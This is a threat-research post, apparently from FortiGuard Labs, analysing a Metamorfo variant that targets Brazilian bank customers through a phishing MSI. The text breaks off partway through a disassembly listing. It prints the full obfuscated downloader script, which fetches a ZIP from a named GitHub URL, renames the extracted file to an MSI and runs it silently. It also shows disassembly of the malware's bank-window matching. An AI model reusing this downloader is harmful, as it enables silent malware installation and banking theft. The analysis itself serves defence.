{"id":17455,"date":"2020-01-15T11:40:30","date_gmt":"2020-01-15T19:40:30","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2020\/01\/15\/news-11191\/"},"modified":"2020-01-15T11:40:30","modified_gmt":"2020-01-15T19:40:30","slug":"news-11191","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2020\/01\/15\/news-11191\/","title":{"rendered":"Deep Analysis of New Metamorfo Variant Targeting Customers of Brazilian Financial Organizations"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b><i>A FortiGuard Labs Threat Analysis Report<\/i><\/b><\/p>\n<p>FortiGuard Labs recently captured a suspicious sample from a phishing email. After a quick analysis, I determined that this was a new variant of the Metamorfo malware, which was known for collecting data from the customers of Brazilian financial organizations.<\/p>\n<p>In this analysis, I will elaborate on what this new variant of Metamorfo does and what data it collects from a victim\u2019s machine, as well as how it communicates with its command and control (C&amp;C) server.<\/p>\n<h2>Spreading in a Phishing Email<\/h2>\n<p>The email was written in Portuguese, the official language of Brazil; Figure 1 shows its content translated into English. It was disguised as a notice asking the victim to download an Electronic Invoice (NF). 
Hovering the mouse over the blue download button reveals the file download URL in the status bar.<\/p>\n<\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1866256683.img.png\/1579115666486\/email-content1-copy.png\" alt=\"Figure 1. Phishing Email Content\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 1. Phishing Email Content<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The downloaded file was not an electronic invoice, but a ZIP file containing an MSI file named \u201cXlsPlan_Visualize.msi\u201d.<\/p>\n<p>As we know, an MSI file is an installer package file used by the Windows OS for the installation, storage, and removal of programs. However, an MSI file is not an executable file like an EXE file; its content is stored in the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Object_Linking_and_Embedding\">OLE document format<\/a>. Instead, double-clicking an MSI file causes Windows to invoke MsiExec.exe to process it.<\/p>\n<h2>Executing VBS code to download another MSI<\/h2>\n<p>There were forty-eight streams (similar to files) inside this \u201cXlsPlan_Visualize.msi\u201d file. Figure 2 shows some of those streams. However, this MSI file is not the final malware body, but simply a malware downloader. 
Let\u2019s go inside the file to see how it works.<\/p>\n<\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1381398213.img.png\/1578613863015\/metamorfo-two.png\" alt=\"Figure 2. Part of the streams inside XlsPlan_Visualize.msi\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 2. Part of the streams inside XlsPlan_Visualize.msi<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The \u201c!_StringData\u201d stream contains a piece of VBS code that MsiExec.exe executes to download another malicious file. The code is mixed with a lot of garbage strings, as you can see in Figure 3.<\/p>\n<\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_662188271.img.png\/1578614393487\/metamorfo-three.png\" alt=\"Figure 3. VBS code in !_StringData stream\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 3. 
VBS code in !_StringData stream<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The highlighted section is part of the VBS code, which has been extracted and listed below (the obfuscated variable names are kept as found; the highlighted tokens are the ones that matter):<\/p>\n<\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<pre>FJSJSKDFSJDFKJS = &quot;<strong>https:\/\/raw.githubusercontent.com\/edx23\/X435\/master\/img.zip<\/strong>&quot;;\n
JFJDKDAKSS = &quot;&quot;;\n
ppasta = &quot;\\Downloads&quot;;\n
JJJFDNMCNNN = &quot; @ p u b l i c @ &quot; + ppasta;\n
JJKKSMNfF = &quot;<strong>KJFLDKRE<\/strong>&quot;;\n
JFJKNNDNDFJKDD = &quot;wscript.shell&quot;;\n
JMDNNSKDJFFF = &quot;Shell.Application&quot;\n
RURIEJNDDS = &quot;Msxml2.XMLHTTP&quot;;\n
JDNNNSC = &quot;scripting.filesystemobject&quot;;\n
JNDDSFCCD = &quot;<strong>GET<\/strong>&quot;;\n
NNCDSXXX = &quot;Adodb.Stream&quot;;\n
JJDALV = &quot;img.jpg&quot;;\n
NXXXDSF = &quot;zip&quot;;\n
JJJFDNMCNNN = JJJFDNMCNNN.replace(\/@\/g, &quot;%&quot;);\n
JJJFDNMCNNN = JJJFDNMCNNN.replace(\/ \/g, &quot;&quot;);\n
KDJNNNDM = new ActiveXObject(JFJKNNDNDFJKDD);\n
JHDHDNSKKK = new ActiveXObject(JDNNNSC);\n
JDNFMDNSKKJDDDD = new ActiveXObject(JMDNNSKDJFFF);\n
JJJFDNMCNNN = KDJNNNDM.expandenvironmentstrings(JJJFDNMCNNN) + &quot;\\&quot;;\n
NNNNDFSG = JJKKSMNfF + &quot;_&quot;;\n
VJJKRRIEO = JJKKSMNfF;\n
VJJKRRIEO = VJJKRRIEO.replace(\/ \/g, &quot;&quot;);\n
FJSJSKDFSJDFKJS = FJSJSKDFSJDFKJS.replace(\/qrzck\/g, &quot;&quot;);\n
JFJDKDAKSS = JFJDKDAKSS.replace(\/qrzck\/g, &quot;&quot;);\n
JQOVID = NNNNDFSG + VJJKRRIEO + &quot;_&quot; + JJKKSMNfF + &quot;.&quot; + NXXXDSF;\n
EQMJKG = JQOVID;\n
JJJFDNMCNNN = JJJFDNMCNNN.replace(\/\\\/g, &quot;@&quot;);\n
JJJFDNMCNNN = JJJFDNMCNNN.replace(\/@\/g, &quot;\\&quot; + &quot;\\&quot;);\n
\n
function unzip(zipfile, unzipdir) {\n
  try {\n
    var JHDHDNSKKK = new ActiveXObject(JDNNNSC),\n
        JDNFMDNSKKJDDDD = new ActiveXObject(JMDNNSKDJFFF),\n
        dst, zip;\n
    if (!unzipdir) { unzipdir = '.'; }\n
    if (!JHDHDNSKKK.FolderExists(unzipdir)) { JHDHDNSKKK.CreateFolder(unzipdir); }\n
    dst = JDNFMDNSKKJDDDD.NameSpace(JHDHDNSKKK.getFolder(unzipdir).Path);\n
    zip = JDNFMDNSKKJDDDD.NameSpace(JHDHDNSKKK.getFile(zipfile).Path);\n
    if (JHDHDNSKKK.FileExists(zipfile)) {\n
      dst.CopyHere(zip.Items(), 4 + 16);\n
      JHDHDNSKKK.DeleteFile(zipfile);\n
      <strong>JHDHDNSKKK.MoveFile(unzipdir + &quot;\\&quot; + JJDALV, unzipdir + &quot;\\&quot; + JJKKSMNfF + &quot;.msi&quot;);<\/strong>\n
      <strong>KDJNNNDM.Run(unzipdir + &quot;\\&quot; + JJKKSMNfF + &quot;.msi \/quiet&quot;, 0, false);<\/strong>\n
    }\n
  } catch (e) { }\n
}\n
\n
try {\n
  OOOOJBJKDDS = new ActiveXObject(RURIEJNDDS);\n
  OOOOJBJKDDS.<strong>open<\/strong>(JNDDSFCCD, FJSJSKDFSJDFKJS + JFJDKDAKSS, false);\n
  OOOOJBJKDDS.<strong>send<\/strong>();\n
} catch (e) {}\n
\n
if (OOOOJBJKDDS.status == 200) {\n
  try {\n
    var UHJEERESC = new ActiveXObject(NNCDSXXX);\n
    UHJEERESC.open();\n
    UHJEERESC.type = 1;\n
    UHJEERESC.<strong>write<\/strong>(OOOOJBJKDDS.responseBody);\n
    UHJEERESC.Position = 0;\n
    UHJEERESC.<strong>saveToFile<\/strong>(JJJFDNMCNNN + JQOVID, 2);\n
    UHJEERESC.close();\n
    <strong>unzip<\/strong>(JJJFDNMCNNN + JQOVID, JJJFDNMCNNN + JJKKSMNfF);\n
  } catch (e) { }\n
}<\/pre>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Going through this VBS code, we learn that it downloads the \u201cimg.zip\u201d file from the URL \u201chxxps[:]\/\/raw[.]githubusercontent[.]com\/edx23\/X435\/master\/img.zip\u201d, saves it under \u201c%Public%\\Downloads\u201d, calls the unzip() function to decompress it into the folder \u201c%Public%\\Downloads\\KJFLDKRE\u201d, and 
then renames the extracted \u201cimg.jpg\u201d to \u201cKJFLDKRE.msi\u201d. Finally, it executes this file with the \u201c\/quiet\u201d parameter, which makes the installer run in the background with no user interface, so the victim doesn\u2019t notice it.<\/p>\n<h2>Basic Information on KJFLDKRE.msi<\/h2>\n<p>\u201cKJFLDKRE.msi\u201d contains an EXE file split into several parts, each of which is stored as a stream. Figure 4 is a screenshot of the content of \u201cKJFLDKRE.msi\u201d. As you can see, the sections of the PE structure were split into several streams, such as \u201cCODE\u201d, \u201cDATA\u201d, and so on.<\/p>\n<\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1812633029.img.png\/1578614612852\/metamorfo-four.png\" alt=\"Figure 4. Split EXE file as streams in KJFLDKRE.msi\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 4. Split EXE file as streams in KJFLDKRE.msi<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>When MsiExec.exe processes this MSI file, the PE file (EXE file) is reassembled into C:\\Windows\\Installer and then executed. The filename is not fixed; in this case it is \u201cMSIA1F6.tmp\u201d. Using an analysis tool, I determined that the file was written in Delphi. 
Figure 5 below shows more detailed information on this \u201cMSIA1F6.tmp\u201d file.<\/p>\n<\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_165694122.img.png\/1578614657209\/metamorfo-five.png\" alt=\"Figure 5. Screenshot of \u201cMSIA1F6.tmp\u201d in an analysis tool\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 5. Screenshot of \u201cMSIA1F6.tmp\u201d in an analysis tool<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Dissecting KJFLDKRE.msi<\/h2>\n<p>\u201cKJFLDKRE.msi\u201d is the real Metamorfo malware, and as mentioned earlier, it runs in the background. In fact, \u201cMSIA1F6.tmp\u201d is extracted from \u201cKJFLDKRE.msi\u201d and executed in a child process of MsiExec.exe. All tasks of the new variant of Metamorfo are performed by \u201cMSIA1F6.tmp\u201d, and the following analysis is based on that file.<\/p>\n<p>I will now show you how it functions inside a victim\u2019s machine in the remaining sections:<\/p>\n<h3>Timer3 Timer Function<\/h3>\n<p>\u201cMSIA1F6.tmp\u201d uses several timers to do its work. It first starts a timer named Timer3, which is triggered every 500 ms.<\/p>\n<p>In its timer function, it collects the victim\u2019s system information, such as the Windows version, login user name, and so on. It then adds an auto-run entry to the victim\u2019s system registry, so that it runs when the system starts. 
The top of Figure 6 shows that it has been added to the auto-run group in the system registry of my test machine, and below that is where the \u201cKJFLDKRE.msi\u201d file is located.<\/p>\n<\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_101953514.img.png\/1578614769163\/metamorfo-six.png\" alt=\"Figure 6. Auto-run group and \u201cKJFLDKRE.msi\u201d\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 6. Auto-run group and \u201cKJFLDKRE.msi\u201d<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>To prevent the victim from noticing anything unusual in the process list, it terminates the MsiExec.exe processes. It looks up MsiExec.exe in the running process list by name and then calls TerminateProcess() to kill it. At least four MsiExec.exe processes are involved in finally executing \u201cMSIA1F6.tmp\u201d.<\/p>\n<p>Figure 7 shows the code snippet that kills the four \u201cmsiexec.exe\u201d processes.<\/p>\n<\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\"> <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\"> <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1830306363.img.png\/1578614818869\/metamorfo-seven.png\" alt=\"Figure 7. Code snippet terminating four \u201cmsiexec.exe\u201d processes\"\/> <\/noscript> <span class=\"cmp-image--title\">Figure 7. 
Code snippet terminating four \u201cmsiexec.exe\u201d processes<\/span> <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As you may have noticed, the process name \u201cmsiexec.exe\u201d is stored encrypted and decrypted at run time. Besides this one, the process contains nearly 2,000 more encrypted strings, which creates a serious challenge for an analyst trying to understand its code.<\/p>\n<p>It then kills Timer3 and starts Timer1.<\/p>\n<h3><b>Timer1 Timer Function<\/b><\/h3>\n<p>Timer1\u2019s interval is set the same as Timer3\u2019s, which is 500 ms.<\/p>\n<p>The major task of this timer function is to identify the applications or web pages of interest based on the victim\u2019s activity.<\/p>\n<p>Every 500 ms it calls the APIs GetForegroundWindow() and GetWindowTextA() to obtain the window title of the foreground program the victim is using, and then performs a string match to determine whether that program is one it wants to collect information from.<\/p>\n<p>During my analysis, I was able to determine that the targets are all Brazilian financial organizations. 
Next, I will elaborate on all of the ways that Metamorfo determines whether those programs are running.<\/p>\n<h3><b>APPs (installed clients):<\/b><\/h3>\n<p>It detects three installed finance applications by calling the API FindWindowA() with the window class name of each one.<\/p>\n<p>Here is example code showing how it finds one application by calling FindWindowA(&quot;SunAwtFrame&quot;, 0).<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">[&hellip;]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A1D&nbsp; push 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;<\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; lpWindowName<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A1F&nbsp; lea &nbsp;edx, [ebp+var_124]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A25&nbsp; mov &nbsp;eax, offset _str_C0589A51A329AEA.Text <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; ;;; de=&gt; [SunAwtFrame]<\/span><\/em><\/strong><\/p>\n<p 
style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A2A&nbsp; call decrypt_string <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A2F&nbsp; mov &nbsp;eax, [ebp+var_124] <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">;&#8221;SunAwtFrame&#8221;<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A35&nbsp; call @System@@LStrToPChar$qqrx17System@AnsiString <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A3A&nbsp; push eax&nbsp;&nbsp; <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; <\/span><\/em><\/strong><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #37bf64; background: #D9D9D9;\">lpClassName<\/span><\/em><\/strong><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\"> &#8220;SunAwtFrame&#8221;<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: 
#D9D9D9;\">00525A3B&nbsp; <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: red; background: #D9D9D9;\">call FindWindowA<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp; &nbsp;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A40&nbsp; cmp &nbsp;eax, [edi]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A42&nbsp; jnz &nbsp;short loc_525AA1<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">[&hellip;]<\/span><\/em><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h3><b>Web Pages<\/b>:<\/h3>\n<p>When the victim opens the web page of an online bank, the web page title will include the bank name information. 
Metamorfo uses string matching to determine if the victim is working on a financial web page using a variety of institution names and acronyms.<\/p>\n<p>Below is a code snippet of how Metamorfo performs a string match:<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">[&#8230;]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525E93 lea &nbsp;edx, [ebp+var_1B4]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525E99 mov &nbsp;eax, [ebp+var_4] <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; System::AnsiString<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525E9C call @Sysutils@UpperCase$qqrx17System@AnsiString <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; Sysutils::UpperCase(System::AnsiString)<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: 
#D9D9D9;\">00525EA1 mov &nbsp;eax, [ebp+var_1B4]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EA7 push eax<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EA8 lea &nbsp;edx, [ebp+var_1B8]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EAE mov &nbsp;eax, offset _str_0A1336275B9FD74.Text <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; ;;; de=&gt; [Name of the bank]<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EB3 <strong>call decrypt_string<\/strong> <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EB8 mov &nbsp;eax, [ebp+var_1B8] <strong>;&rdquo;<\/strong><\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">Name of the bank<\/span><\/em><\/strong><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&rdquo;<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 
0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EBE pop &nbsp;edx <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; upper case of topmost window title<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EBF <strong>call string_match<\/strong> <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EC4 test eax, eax<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EC6 jg&nbsp; short <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">Name of the bank<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">_found<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EC8 lea &nbsp;edx, [ebp+var_1BC]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: 
black; background: #D9D9D9;\">00525ECE mov &nbsp;eax, offset _str_29DB1CCA0BB2122.Text <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; ;;; de=&gt; [Alternate name of the bank<\/span><\/em><\/strong><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050;\">]<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525ED3 <strong>call decrypt_string<\/strong> <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525ED8 mov &nbsp;eax, [ebp+var_1BC] <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">;&rdquo;Alternate name of the bank&rdquo;<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EDE mov &nbsp;edx, [ebp+var_4] <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; topmost window title<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EE1 <strong>call string_match<\/strong> <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, 
sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EE6 test eax, eax<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EE8 jg&nbsp; short <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">Alternate name of the bank<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">_found<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EEA lea &nbsp;edx, [ebp+var_1C0]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EF0 mov &nbsp;eax, offset _str_0435F40658F86D8.Text <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; ;;; de=&gt; [Bank URL]<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EF5 <strong>call decrypt_string<\/strong> <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times 